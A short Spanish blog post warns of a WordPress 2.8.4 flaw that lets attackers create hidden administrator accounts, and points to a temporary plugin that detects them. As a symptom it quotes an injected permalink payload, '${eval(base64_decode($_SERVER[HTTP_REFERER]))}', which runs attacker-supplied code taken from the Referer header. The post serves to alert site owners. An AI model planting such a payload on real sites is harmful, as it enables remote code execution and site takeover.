Se ha detectado un problema de seguridad muy grave en WordPress, incluso en la última versión, 2.8.4. Lo que pasa es que cualquiera puede crearse un usuario con privilegios de administrador en tu blog y hacer lo que quiera con él. El síntoma principal es el cambio de permalinks, en Ayuda WordPress comentan que tus permalinks pueden cambiar a algo como:

http://miblog.com/mi-post/${eval(base64_decode($_SERVER[HTTP_REFERER]))}

En Ayuda WordPress, ya nos brindan una solución temporal creada por Sumolari. Se trata de un plugin que detecta los administradores fantasma basándose en datos que nosotros le brindemos, especificamos los administradores reales que tiene que haber y el plugin detecta los que estén demás.

NO es una solución al problema, es sólo una forma de prevenirlo hasta que saquen una nueva versión de WordPress y solucionen el problema.